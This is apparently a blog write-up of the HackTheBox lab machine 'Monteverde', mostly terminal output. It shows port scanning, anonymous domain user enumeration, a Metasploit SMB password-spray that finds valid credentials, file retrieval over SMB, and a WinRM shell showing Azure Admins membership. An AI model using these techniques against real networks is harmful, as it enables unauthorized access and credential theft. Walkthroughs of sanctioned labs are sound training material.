Ahmed Samir

Jun 18, 2020

5 min read

HackTheBox — Monteverde

Summary

Enumeration

Nmap

root@strike:~# nmap -sC -sV 10.10.10.172
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-18 00:51 EET
Nmap scan report for 10.10.10.172
Host is up (0.13s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-17 22:07:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=6/18%Time=5EEA9EAC%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -44m49s, deviation: 0s, median: -44m49s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-06-18 00:09:53
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 297.02 seconds
root@strike:~#
root@strike:~# rpcclient -U "" -N 10.10.10.172
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
rpcclient $>

Exploitation

msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > set SMBDomain MEGABANK.LOCAL
SMBDomain => MEGABANK.LOCAL
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE /root/Desktop/users.txt
USER_FILE => /root/Desktop/users.txt
msf5 auxiliary(scanner/smb/smb_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.172
rhosts => 10.10.10.172
msf5 auxiliary(scanner/smb/smb_login) > exploit

[*] 10.10.10.172:445 - 10.10.10.172:445 - Starting SMB login bruteforce
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\Guest:Guest',
[!] 10.10.10.172:445 - No active DB -- Credential data will not be saved!
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\AAD_987d7f2f57d2:AAD_987d7f2f57d2',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\mhope:mhope',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\dgalanos:dgalanos',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\roleary:roleary',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\smorgan:smorgan',
[+] 10.10.10.172:445 - 10.10.10.172:445 - Success: 'MEGABANK.LOCAL\SABatchJobs:SABatchJobs'
[*] 10.10.10.172:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_login) >
root@strike:~# smbclient -U 'SABatchJobs' //10.10.10.172/users$
WARNING: The "encrypt passwords" option is deprecated
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
WARNING: The "null passwords" option is deprecated
Enter WORKGROUP\SABatchJobs's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jan 3 15:12:48 2020
.. D 0 Fri Jan 3 15:12:48 2020
dgalanos D 0 Fri Jan 3 15:12:30 2020
mhope D 0 Fri Jan 3 15:41:18 2020
roleary D 0 Fri Jan 3 15:10:30 2020
smorgan D 0 Fri Jan 3 15:10:24 2020

524031 blocks of size 4096. 519955 blocks available
smb: \> cd mhope
smb: \mhope\> ls
. D 0 Fri Jan 3 15:41:18 2020
.. D 0 Fri Jan 3 15:41:18 2020
azure.xml AR 1212 Fri Jan 3 15:40:23 2020

524031 blocks of size 4096. 519955 blocks available
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (3.3 KiloBytes/sec) (average 3.3 KiloBytes/sec)
smb: \mhope\>

Privilege Escalation

*Evil-WinRM* PS C:\Users\mhope\Desktop> net users mhope
User name mhope
Full Name Mike Hope
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 1/2/2020 4:40:05 PM
Password expires Never
Password changeable 1/3/2020 4:40:05 PM
Password required Yes
User may change password No

Workstations allowed All
Logon script
User profile
Home directory \\monteverde\users$\mhope
Last logon 6/17/2020 3:58:24 PM

Logon hours allowed All

Local Group Memberships *Remote Management Use
Global Group memberships *Azure Admins *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\mhope\Desktop>

THX for ur time!